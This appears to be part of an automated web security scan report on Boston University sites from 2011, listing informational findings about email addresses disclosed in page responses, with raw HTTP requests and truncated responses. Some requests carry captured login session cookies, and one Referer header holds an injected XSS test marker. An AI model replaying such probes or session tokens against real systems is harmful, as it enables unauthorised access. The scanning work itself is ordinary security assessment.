Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 05 Oct 2011 17:50:12 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToyY1ArxHDsAAFj0ixgAAABE
X-BU-Duration: D=195964
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 524

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>500 Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error</H1>
The server encountered an internal error or
miscon
...[SNIP]...
<P>
Please contact the server administrator,
webmaster@bu.edu and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.<P>
...[SNIP]...

10.2. https://weblogin.bu.edu/accounts/forgot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:55 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Expires: Tue, 04 Oct 2011 17:49:56 GMT
pragma: no-cache
cache-control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhRhSAAAAAf
X-BU-Duration: D=1537718
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 6527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>
[1] BU Accounts | Identify Forgot
</title>
<meta http-equiv="Content-Type" content="text/html;">
<!--Fireworks M
...[SNIP]...
<br>ithelp@bu.edu</p>
...[SNIP]...

10.3. https://weblogin.bu.edu/webnew/alumnew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The following email address was disclosed in the response:

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...
<a href="mailto:help@alum.bu.edu">help@alum.bu.edu</a>
...[SNIP]...

10.4. https://www.bu.edu/alumni-forms/forms/annualfund/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/annualfund/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /alumni-forms/forms/annualfund/index.html HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 23 Feb 2011 16:23:26 GMT
ETag: "1bd4002400001234-e39a-49cf584379bbe"
Accept-Ranges: bytes
Content-Length: 58266
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGUNv00AAAMX
X-BU-Duration: D=13739
X-BU-Backend: content_default (null)
Content-Type: text/html
Via: 1.1 www.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...
<a href="mailto: bugiving@bu.edu"> bugiving@bu.edu</a>
...[SNIP]...

10.5. https://www.bu.edu/alumni-forms/forms/ath/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/ath/

Issue detail

The following email address was disclosed in the response:

Request

GET /alumni-forms/forms/ath/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Mar 2011 20:35:24 GMT
ETag: "1bd4014400001234-1423b-49fb91dc41b58"
Accept-Ranges: bytes
Content-Length: 82491
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGVNx3UAAAOV
X-BU-Duration: D=19114
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equi
...[SNIP]...
<a href="mailto: bugiving@bu.edu"> bugiving@bu.edu</a>
...[SNIP]...

10.6. https://www.bu.edu/alumni-forms/forms/giving/online/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/giving/online/index/

Issue detail

The following email address was disclosed in the response:

Request

GET /alumni-forms/forms/giving/online/index/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Tue, 24 May 2011 14:44:12 GMT
ETag: "1bd400b200001234-e4a5-4a4069f0c8744"
Accept-Ranges: bytes
Content-Length: 58533
X-BU-Main-Uniqueid: ToybaQrxHDYAAEndiNsAAAWQ
X-BU-Duration: D=12581
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...
<a href="mailto: bugiving@bu.edu"> bugiving@bu.edu</a>
...[SNIP]...

10.7. https://www.bu.edu/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni/

Issue detail

The following email address was disclosed in the response:

Request

GET /alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:02 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:21:08 GMT
Accept-Ranges: bytes
Content-Length: 19106
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:36:02 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiZgrxHDYAAGUNv1QAAAMR
X-BU-Duration: D=12731
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<a href="mailto:arcom@bu.edu">
...[SNIP]...

10.8. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Issue detail

The following email address was disclosed in the response:

Request

GET /link/bin/uiscgi_studentlink?applpath=menu.pl&NewMenu=Personal HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:40 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyYPArxHD4AAFACKQMAAAAc
X-BU-Duration: D=426050
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:40 2011
...[SNIP]...
<A HREF="mailto:thelink@bu.edu">
...[SNIP]...

10.9. https://www.bu.edu/phpbin/telegraph/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The following email address was disclosed in the response:

Request

POST /phpbin/telegraph/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&p
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybcgrxHDYAAEnbg64AAAQM
X-BU-Duration: D=1007362
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...
<a href="mailto: bugiving@bu.edu"> bugiving@bu.edu</a>
...[SNIP]...

10.10. https://www.bu.edu/tech/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/about/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/about/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:24 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 67007
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:24 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQArxHDYAAGUNvSUAAAMM
X-BU-Duration: D=8774
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.11. https://www.bu.edu/tech/accounts/wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/accounts/wireless/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tech/accounts/wireless/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://netreg.bu.edu/faq.cgi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:37 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 17:59:36 GMT
Accept-Ranges: bytes
Content-Length: 69132
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:04:37 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybCQrxHDYAAEY9TssAAAIA
X-BU-Duration: D=9325
X-BU-Backend: niscms http://wwwcms02.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<a href="mailto:nethelp@bu.edu">nethelp@bu.edu</a>
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.12. https://www.bu.edu/tech/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/contact/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tech/contact/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:23 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPwrxHDYAAGJWsScAAAFN
X-BU-Duration: D=366081
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...
<a href="mailto:phone@bu.edu">phone@bu.edu</a>
...[SNIP]...
<a href="mailto:mediagp@bu.edu">mediagp@bu.edu</a>
...[SNIP]...
<a href="mailto:thelink@bu.edu">thelink@bu.edu</a>
...[SNIP]...
<a href="mailto:help@scv.bu.edu">help@scv.bu.edu</a>
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.13. https://www.bu.edu/tech/policies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/policies/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/policies/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:27 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:19:59 GMT
Accept-Ranges: bytes
Content-Length: 68846
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:27 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQwrxHDYAAGUNvWMAAAMB
X-BU-Duration: D=8720
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.14. https://www.bu.edu/tech/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/projects/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/projects/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:26 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 66854
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:26 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQgrxHDYAAGJVrYoAAAHY
X-BU-Duration: D=10295
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.15. https://www.bu.edu/tech/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/service/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/service/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:25 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:24 GMT
Accept-Ranges: bytes
Content-Length: 67216
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:25 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQQrxHDYAAGUMumgAAAKZ
X-BU-Duration: D=11105
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.16. https://www.bu.edu/tech/services/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/alumni/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:22 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPgrxHDYAAGUMulEAAAKP
X-BU-Duration: D=386473
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.17. https://www.bu.edu/tech/services/departments/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/departments/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/departments/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:21 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:20 GMT
Accept-Ranges: bytes
Content-Length: 108281
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:21 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPQrxHDYAAGJWsQ4AAAFU
X-BU-Duration: D=10019
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.18. https://www.bu.edu/tech/services/faculty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/faculty/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/faculty/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:52 GMT
Accept-Ranges: bytes
Content-Length: 105352
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGJWsOoAAAFG
X-BU-Duration: D=8712
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
